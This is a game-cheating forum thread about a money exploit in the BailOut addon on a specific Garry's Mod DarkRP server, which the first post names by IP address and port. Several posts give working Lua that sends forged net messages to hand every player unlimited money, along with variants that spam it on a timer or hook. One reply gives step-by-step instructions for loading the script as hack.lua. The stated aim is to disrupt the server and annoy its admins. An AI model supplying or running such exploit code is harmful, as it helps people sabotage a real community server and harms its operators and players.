Page 1 of 2 12 LastLast
Results 1 to 15 of 19
  1. #1
    TopKekSwag's Avatar
    Join Date
    Jul 2015
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0

    DarkRP server with money exploit

    I found an autistic DarkRP server that still has the BailOut addon that you can exploit to give people money.
    I got banned on it, so I thought I'd put the IP here so you kids can have some fun with it while it lasts.

    IP: 76.164.209.235:27055

    To make the admins butthurt real quick:
    Code:
    for k, v in pairs(player.GetAll()) do
    	net.Start("BailOut")
    	net.WriteEntity(v)
    	net.WriteEntity(v)
    	net.WriteFloat(math.huge)
    	net.SendToServer()
    end
    enjoy

  2. #2
    Yimo's Avatar
    Join Date
    Jul 2015
    Gender
    female
    Location
    USA
    Posts
    73
    Reputation
    10
    Thanks
    4
    My Mood
    Happy
    I am stupid, so what do I do with this? Haha

  3. #3
    Keepo123's Avatar
    Join Date
    Oct 2015
    Gender
    male
    Location
    m͏̺͓̲̥̪is̷t̞̖͍͚̤k̥B̸̼&#81
    Posts
    84
    Reputation
    10
    Thanks
    164
    My Mood
    Yeehaw
    Code:
    function k()
    	for k, v in pairs(player.GetAll()) do
    	net.Start("BailOut")
    	net.WriteEntity(v)
    	net.WriteEntity(v)
    	net.WriteFloat(math.huge)
    	net.SendToServer()
    end
    timer.Create("", 0.1, 0, k)
    will spam the script

  4. The Following User Says Thank You to Keepo123 For This Useful Post:

    buckballs (02-08-2016)

  5. #4
    buckballs's Avatar
    Join Date
    Oct 2014
    Gender
    male
    Location
    Behind you
    Posts
    0
    Reputation
    10
    Thanks
    336
    My Mood
    Paranoid
    Quote Originally Posted by Yimo View Post
    I am stupid, so what do I do with this? Haha
    Copy this code and paste it into a text file. Save the file as hack.lua. Copy hack.lua into your garry's mod lua folder. get onto the server and do lua_openscript_cl hack.lua

  6. The Following User Says Thank You to buckballs For This Useful Post:

    zer3000 (02-21-2016)

  7. #5
    yarmis's Avatar
    Join Date
    Mar 2015
    Gender
    male
    Location
    Southern States
    Posts
    10
    Reputation
    10
    Thanks
    0
    My Mood
    Aggressive
    There is an error

  8. #6
    suchisgood's Avatar
    Join Date
    Feb 2014
    Gender
    female
    Posts
    902
    Reputation
    10
    Thanks
    565
    My Mood
    Angelic
    Quote Originally Posted by Keepo123 View Post
    Code:
    function k()
    	for k, v in pairs(player.GetAll()) do
    	net.Start("BailOut")
    	net.WriteEntity(v)
    	net.WriteEntity(v)
    	net.WriteFloat(math.huge)
    	net.SendToServer()
    end
    timer.Create("", 0.1, 0, k)
    will spam the script
    Code:
    function k()
    	for k, v in pairs(player.GetAll()) do
    	net.Start("BailOut")
    	net.WriteEntity(v)
    	net.WriteEntity(v)
    	net.WriteFloat(math.huge)
    	net.SendToServer()
    end
    timer.Create("", 0.1, 0, function() k() end)

  9. #7
    Hunter's Avatar
    Join Date
    Dec 2013
    Gender
    male
    Location
    Depths Of My Mind.
    Posts
    17,468
    Reputation
    3771
    Thanks
    6,159
    My Mood
    Cheerful
    /Moved to the correct section.

  10. #8
    dfsmonkeyspamd's Avatar
    Join Date
    Dec 2015
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    It gave me an error and didn't work, do i need a certain DLL?

  11. #9
    Keepo123's Avatar
    Join Date
    Oct 2015
    Gender
    male
    Location
    m͏̺͓̲̥̪is̷t̞̖͍͚̤k̥B̸̼&#81
    Posts
    84
    Reputation
    10
    Thanks
    164
    My Mood
    Yeehaw
    Quote Originally Posted by suchisgood View Post
    Code:
    function k()
    	for k, v in pairs(player.GetAll()) do
    	net.Start("BailOut")
    	net.WriteEntity(v)
    	net.WriteEntity(v)
    	net.WriteFloat(math.huge)
    	net.SendToServer()
    end
    timer.Create("", 0.1, 0, function() k() end)
    I don't understand?

  12. #10
    suchisgood's Avatar
    Join Date
    Feb 2014
    Gender
    female
    Posts
    902
    Reputation
    10
    Thanks
    565
    My Mood
    Angelic
    Quote Originally Posted by Keepo123 View Post
    I don't understand?
    It wouldn't work as stated above your post @dfsmonkeyspamd

  13. #11
    Keepo123's Avatar
    Join Date
    Oct 2015
    Gender
    male
    Location
    m͏̺͓̲̥̪is̷t̞̖͍͚̤k̥B̸̼&#81
    Posts
    84
    Reputation
    10
    Thanks
    164
    My Mood
    Yeehaw
    Quote Originally Posted by suchisgood View Post
    It wouldn't work as stated above your post @dfsmonkeyspamd
    Oh, well I most of mistyped something, I've never used "function() k() end)" in a timer and it has worked.

  14. The Following User Says Thank You to Keepo123 For This Useful Post:

    buckballs (02-08-2016)

  15. #12
    mr. kifrizzles's Avatar
    Join Date
    Dec 2015
    Gender
    male
    Posts
    2
    Reputation
    10
    Thanks
    1
    Quote Originally Posted by Keepo123 View Post
    Code:
    function k()
    	for k, v in pairs(player.GetAll()) do
    	net.Start("BailOut")
    	net.WriteEntity(v)
    	net.WriteEntity(v)
    	net.WriteFloat(math.huge)
    	net.SendToServer()
    end
    timer.Create("", 0.1, 0, k)
    will spam the script
    Or you can do something with a hook!

    hook.Add("CreateMove", "BailSpam", function()for k, v in pairs(player.GetAll()) do
    net.Start("BailOut")
    net.WriteEntity(v)
    net.WriteEntity(v)
    net.WriteFloat(math.huge)
    net.SendToServer()
    end
    end);

  16. #13
    Gorzoid's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Posts
    227
    Reputation
    10
    Thanks
    990
    Quote Originally Posted by mr. kifrizzles View Post
    Or you can do something with a hook!

    hook.Add("CreateMove", "BailSpam", function()for k, v in pairs(player.GetAll()) do
    net.Start("BailOut")
    net.WriteEntity(v)
    net.WriteEntity(v)
    net.WriteFloat(math.huge)
    net.SendToServer()
    end
    end);
    ewww, if you are going to use a hook, use think or tick
    I am just here to learn, definitely not for hacks... o_O Just learning

  17. #14
    Feardex's Avatar
    Join Date
    Sep 2012
    Gender
    male
    Location
    Behind you
    Posts
    322
    Reputation
    60
    Thanks
    550
    My Mood
    Amused
    How does this work?

    I've been doing anything, its giving me an error

    Im getting this error:

    [ERROR] lua/ lolz.lua:9: 'end' expected (to close 'function' at line 1) near '<eof>'
    1. unknown - lua/ lolz.lua:0
    Last edited by Feardex; 12-28-2015 at 05:49 AM.

  18. #15
    Awesomenoob33's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Posts
    6
    Reputation
    10
    Thanks
    0
    My Mood
    Bored
    Quote Originally Posted by buckballs View Post
    Copy this code and paste it into a text file. Save the file as hack.lua. Copy hack.lua into your garry's mod lua folder. get onto the server and do lua_openscript_cl hack.lua
    I did all of that exactly the way the instructions said on the listed server but I just get an error.
    Somebody please help me.

Page 1 of 2 12 LastLast

Similar Threads

  1. [Discussion] Shitty DarkRP server with retarded admins
    By digitaldesiqn in forum Garry's Mod Discussions & Help
    Replies: 0
    Last Post: 05-03-2015, 10:52 AM
  2. [Release] Server with extended ban exploit!
    By tehhkp in forum Garry's Mod Hacks & Cheats
    Replies: 6
    Last Post: 11-24-2014, 01:52 AM
  3. [WTS] Garry's Mod DarkRP server money service.
    By GeeZeeJay in forum User Services
    Replies: 0
    Last Post: 09-14-2014, 07:44 AM
  4. [Help] New DarkRP Money Exploits? (Wire, Money Pot, etc)?
    By Infectability in forum Garry's Mod Discussions & Help
    Replies: 2
    Last Post: 07-30-2014, 07:51 PM
  5. Selling a darkrp money exploit? [Details inside]
    By spaggy in forum Garry's Mod Discussions & Help
    Replies: 26
    Last Post: 05-03-2013, 06:34 PM